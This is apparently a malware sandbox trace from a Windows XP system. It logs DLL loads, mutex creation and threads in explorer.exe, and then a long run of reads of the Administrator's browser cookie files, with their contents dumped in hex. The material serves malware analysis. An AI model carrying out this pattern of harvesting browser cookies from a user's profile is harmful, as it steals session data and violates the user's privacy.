Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 1987680681
Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1987682440
Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 1987696550
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 1987698341
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 2A50000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 1987719420
Section loaded Path: \KnownDlls\msapsspc.dll Access: write and read and execute Type: unknown Baseaddress: 2A50000 Size: 184320 Protection: readonly Mapped to pid: own pid object name not found 1988025411
Section loaded Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 1988030803
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 1988035816
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1988045172
Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 1988093173
Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 1988095050
Section loaded Path: \KnownDlls\schannel.dll Access: write and read and execute Type: unknown Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid object name not found 1988111808
Section loaded Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 1988113563
Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: 19D0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1988144915
Section loaded Path: \KnownDlls\digest.dll Access: write and read and execute Type: unknown Baseaddress: 19D0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 1988145302
Section loaded Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 1988153125
Section loaded Path: \KnownDlls\msnsspc.dll Access: write and read and execute Type: unknown Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 1988196748
Section loaded Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid success or wait 1988202891
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid object name not found 1988213069
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1988214672
Thread created PID: 1636 TID: 4012 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988234319
System info queried Type: ProcessInformation success or wait 1988240059
Mutant created Name: \BaseNamedObjects\Global\{3A87297E-11E3-15F1-185B-81F8EE8A3A3D} success or wait 1988241691
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci object name not found 1988252111
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2AD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1988252361
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 2AD0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1988267152
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 1988274562
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 2A90000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 1988294136
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 2A90000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 1988301712
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 1988308253
Section loaded Path: \KnownDlls\cryptdll.dll Access: write and read and execute Type: unknown Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 1988319463
Section loaded Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 1988321246
Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 Access: write Type: unknown Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 1988393748
Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 Access: query and write and read Type: commit Baseaddress: 2A90000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 1988397358
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 2A90000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 1988441393
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 1988446269
Thread created PID: 1636 TID: 4016 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988602559
Mutant created Name: \BaseNamedObjects\Global\{3A87297F-11E2-15F1-185B-81F8EE8A3A3D} success or wait 1988605905
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988607960
System info queried Type: ProcessInformation success or wait 1988608277
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1988610797
Mutant created Name: \BaseNamedObjects\Global\{C5C44599-7D04-EAB2-185B-81F8EE8A3A3D} success or wait 1988612085
File moved New path: TRUE Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1988612668
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci object name not found 1988619875
Thread created PID: 1636 TID: 4020 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988665501
Mutant created Name: \BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} success or wait 1988666214
System info queried Type: ProcessInformation success or wait 1988666668
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2B50000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1988669192
Thread created PID: 1636 TID: 4024 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988716865
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1988718374
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 1988718545
Mutant created Name: \BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} success or wait 1988718896
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 1988720378
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988723838
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988731982
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Offset: none Length: 222 Value: 75 0A 34 64 64 61 36 36 61 37 30 64 38 61 62 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 30 38 39 30 39 33 31 32 30 0A 33 30 31 35 39 32 38 30 0A 32 30 33 37 32 36 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A 69 5F 31 0A 33 33 3A 39 36 37 3A 35 35 35 3A 30 3A 30 success or wait 1988732139
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988732903
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988733319
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 1988733421
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988734146
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988734563
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 1988734669
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988735391
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988736403
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Offset: none Length: 102 Value: 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 1988736509
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988737134
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988738160
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Offset: none Length: 101 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1988738265
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988738889
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988739309
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Offset: none Length: 191 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 34 37 35 38 30 30 31 39 32 0A 33 30 31 39 33 32 37 33 0A 32 34 33 35 32 36 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A success or wait 1988739414
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988740093
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988741101
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Offset: none Length: 204 Value: 53 52 43 48 44 0A 4D 53 3D 31 37 38 33 35 38 30 26 44 3D 31 37 38 33 35 35 32 26 41 46 3D 4E 4F 46 4F 52 4D 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 38 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 35 38 32 30 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A success or wait 1988741208
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988741930
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988742962
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Offset: none Length: 291 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 1988743069
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988743805
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988744857
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Offset: none Length: 69 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988744963
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988745577
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988746885
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Offset: none Length: 68 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988746991
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988747647
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988748973
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Offset: none Length: 67 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1988749091
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988749700
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988750121
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Offset: none Length: 67 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 35 34 37 37 33 33 37 36 0A 33 30 31 35 33 36 34 34 0A 32 34 35 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1988750226
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988750831
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988751847
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Offset: none Length: 83 Value: 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988751953
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988752643
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988753670
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Offset: none Length: 122 Value: 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 79 67 31 65 38 31 65 2D 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 35 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A success or wait 1988753777
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988754409
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988754831
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Offset: none Length: 88 Value: 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1988754936
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988755559
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988756572
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Offset: none Length: 99 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 1988756678
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988757307
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988758323
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Offset: none Length: 100 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1988758429
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988759053
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988760103
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 1988760222
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988760846
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988761926
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 1988762031
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988762696
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988763124
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 1988763230
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988763910
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988764943
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Offset: none Length: 455 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1988765050
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988765908
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988766335
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Offset: none Length: 387 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 1988766441
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988767254
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988768288
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Offset: none Length: 457 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 38 35 62 63 63 31 63 34 31 37 65 31 34 34 63 62 61 33 61 62 39 62 65 65 62 61 36 62 62 35 32 32 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 31 34 37 39 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A success or wait 1988768394
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988769228
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988770252
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Offset: none Length: 690 Value: 46 43 30 30 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 31 31 32 30 30 30 0A 33 30 32 39 39 38 37 35 0A 32 33 39 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A 46 43 30 31 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 success or wait 1988770359
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988771924
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988772361
